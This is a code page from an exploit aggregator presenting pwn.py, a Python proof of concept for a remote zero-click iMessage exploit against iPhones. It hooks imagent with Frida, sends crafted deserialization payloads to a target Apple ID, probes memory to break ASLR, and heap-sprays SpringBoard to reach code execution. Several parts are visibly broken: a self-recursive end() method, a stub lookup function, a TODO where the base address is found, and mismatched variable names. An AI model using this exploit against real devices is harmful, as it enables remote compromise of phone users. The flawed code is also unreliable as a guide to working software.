4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / pwn.py PY
import frida
import random
import subprocess
import sys
import time
import os

CRASH_DELAY = 10
HEAPSPRAY_ADDR = 0x140000000
SHARED_CACHE_BASE = None
SHARED_CACHE_WRITABLE_REGION_OFFSET = 0x31acc00
TARGET_APPLE_ID = '[email protected]'

# The class representing a target device to which iMessages can be sent.
class Device:
  def __init__(self, apple_id):
    self.apple_id = apple_id
    self.ready = False
    self._delivery_receipts = 0

    # Set up frida hooking of imagent to inject our payloads
    session = frida.attach('imagent')
    code = open('./hook.js', 'r').read()
    script = session.create_script(code)
    script.on('message', self._on_message)
    script.load()

    while not self.ready:
      time.sleep(1)

  def send_message(self, message):
    self._delivery_receipts = 0
    subprocess.check_call(['osascript', 'sendMessage.applescript', self.apple_id, message])
    while self._delivery_receipts == 0:
      time.sleep(1)

  # Send the current payload as the ATI key, which will be deserialized in imagent
  # Wait until the message has been received or the waiting time surpass CRASH_DELAY.
  def send_payload_to_imagent(self):
    return self._send_payload('ATI')

  # Send the current payload as the BP key, which will be deserialized in Springboard.
  # Wait until the message has been received or the waiting time surpass CRASH_DELAY
  def send_payload_to_springboard(self):
    return self._send_payload('BP')

  def _send_payload(self, key):
    self._delivery_receipts = 0
    subprocess.check_call(['osascript', 'sendMessage.applescript', self.apple_id, f'INJECT_{key}'])
    count = 0
    while self._delivery_receipts == 0 and count < CRASH_DELAY:
      time.sleep(1)
      count += 1
    return self._delivery_receipts > 0

  # The handler to cope with receiving message
  def _on_message(self, message, data):
    if message['type'] == 'send':
      payload = message['payload']
      if payload == 'READY':
        self.ready = True
      elif payload == 'DELIVERY_RECEIPT':
        self._delivery_receipts += 1
      else:
        pass

# The generator class to generate different NSUnarchiver payload and write it to /private/var/tmp/com.apple.message/payload 
class Payloads:
  @staticmethod
  def generate_calcpop_heapspray_payload(shared_cache_base):
    subprocess.check_call(['./gen_payload_calcpop.py', hex(shared_cache_base)])
    # Convert to binary format to save a few bytes.
    subprocess.check_call(['plutil', '-convert', 'binary1', '/private/var/tmp/com.apple.message/payload'])
  
  @staticmethod
  def generate_kernelpanic_heapspray_payload(shard_cache_base):
    subprocess.check_call(['/gen_payload_kernelpanic.py', hex(shared_cache_base)])
    # Convert to binary format to save a few bytes.
    subprocess.check_call(['plutil', '-convert', 'binary1', '/private/var/tmp/com.apple.message/payload'])

  @staticmethod
  def generate_addr_deref_payload(addr):
    subprocess.check_call(['/gen_payload_deref.py', hex(addr)])

  @staticmethod
  def generate_fakeobj_dealloc_trigger(addr):
    subprocess.check_call(['/gen_fakeobj_dealloc.py', hex(addr)])


class SharedCacheProfile:
  def __init__(self, zero_map, ptr_map, tp_map):
    assert(len(zero_map) == len(ptr_map) == len(tp_map))

    self.base = 0x180000000
    self.zero_map = zero_map
    self.ptr_map = ptr_map
    self.tp_map = tp_map

  def map(self, new_base):
    self.base = new_base

  def start(self):
    return self.base
  
  def end(self):
    return self.end()

  def size(self):
    return len(self.zero_map) * 8 * 8
  
  def __str__(self):
    return f'SharedCacheProfile profile mapped between 0x{self.start()} and 0x{self.end()}'

  def isNull(self, address):
    return self._bitmap_lookup(address, self.zero_map)
  
  def isTaggedPtr(self, address):
    return self._bitmap_lookup(address, self.tp_map)

  def isPointer(self, address):
    return self._bitmap_lookup(address, self.ptr_map)

  def _bitmap_lookup(self, address, bitmap):
    pass

# The function sends crash payload to walk over the address range in which the shared cache is
# mapped in 128MB steps until it finds a valid address
def find_valid_shared_cache_address(target):
  # Find the valid shared cache from 0x180000000 to 0x280000000
  start = 0x180000000
  end = 0x280000000
  step = 128 * 1024 * 1024

  print('[INFO]: Trying to find a valid address ...')

  for address in range(start, end, step):
    print(f'Testing address 0x{address} ...')

    Payloads.generate_addr_deref_payload(address)
    if target.send_payload_to_imagent():
      print(f'[INFO]: 0x{address} is valid!')
      return address

  raise Exception('Couldn\'t find a valid address ...')


def break_aslr(target):
  found_address = find_valid_shared_cache_address(target)
  
  print('[INFO]: Start breaking your ASLR, please wait ...')

  # We now have a valid address inside the shared_cache. With that, and the binary profile
  # of the shared cache, we can now construct a list of candidate slide offsets.
  shared_cache_nullmap = open('./shared_cache_profile/shared_cache_nullmap.bin', 'rb').read()
  shared_cache_ptrmap = open('./shared_cache_profile/shared_cache_ptrmap.bin', 'rb').read()
  shared_cache_tpmap = open('./shared_cache_profile/shared_cache_tpmap.bin', 'rb').read()
  shared_cache = SharedCacheProfile(shared_cache_nullmap, shared_cache_ptrmap, shared_cache_tpmap)

  possible_base_addresses = []

  page_size = 0x4000
  min_base = 0x280000000
  max_base = 0x180000000

  for candidate in range(shared_cache.start(), shared_cache.end(), page_size):
    if shared_cache.isNull(candidate) or shared_cache.isTaggedPtr(candidate):
      base_address = found_address - (candidate - shared_cache.start())
      if base_address > max_base and base_address + shared_cache.size() < min_base:
        possible_base_addresses.append(base_address)

  print(f'[INFO]: Have {len(possible_base_addresses)} potential candidates for the dyld shared cache slide')

  candidates = []
  for address in possible_base_addresses:
    candidate = SharedCacheProfile(shared_cache_nullmap, shared_cache_ptrmap, shared_cache_tpmap)
    candidate.map(address)

    if candidate.start() < min_base:
      min_base = candidate.start()
    if candidate.end() > max_base:
      max_base = candidate.end()

    assert(candidate.isNull(found_address) or candidate.isTaggedPtr(found_address))
    candidates.append(candidate)

  assert(min_base < max_base)
  print(f'[INFO]: Shared cache is mapped somewhere between 0x{min_base} and 0x{max_base}')
  print(f'[INFO]: Now determining exact base address of shared cache ...')

  # TODO: determine the exact base address of shared cache


def pwn(target):
  print(f'[Info]: Start to exploit remote iPhone {TARGET_APPLE_ID} ...')
  os.makedirs('/private/var/tmp/com.apple.messages/', exist_ok=True)

  shared_cache_base = SHARED_CACHE_BASE
  # Obtain 
  if shared_cache_base is None:
    print('[Info]: Break ASLR ...')
    shared_cache_base = break_aslr(target)

  print(f'[Info]: Shared cache is mapped at 0x{shared_cache_base}')
  target.send_message(f'Your shared cache starts at 0x{shared_cache_base}')

  input('[Info]: Press enter to continue ...')

  print('[Info]: Generate payload to pop calculator ...')
  Payloads.generate_calcpop_heapspray_payload(shared_cache_base)

  SPRAYSIZE = 768 * 1024 * 1024
  MSGSIZE = 32 * 1024 * 1024
  NUM_SPRAY = SPRAYSIZE // MSGSIZE
  for i in range(NUM_SPRAY):
    target.send_payload_to_springboard()
    time.sleep(1)
    print(f'[Info]: Sending heap spray part {i + 1}/{NUM_SPRAY}')

  time.sleep(10)
  target.send_message('Enjoy the calculator!!')
  print('[Info]: Open calculator successfully!')

  Payloads.generate_fakeobj_dealloc_trigger(HEAPSPRAY_ADDR + 0x3ff8)
  target.send_payload_to_springboard()

  time.sleep(1000)


target = Device(TARGET_APPLE_ID)
pwn(target)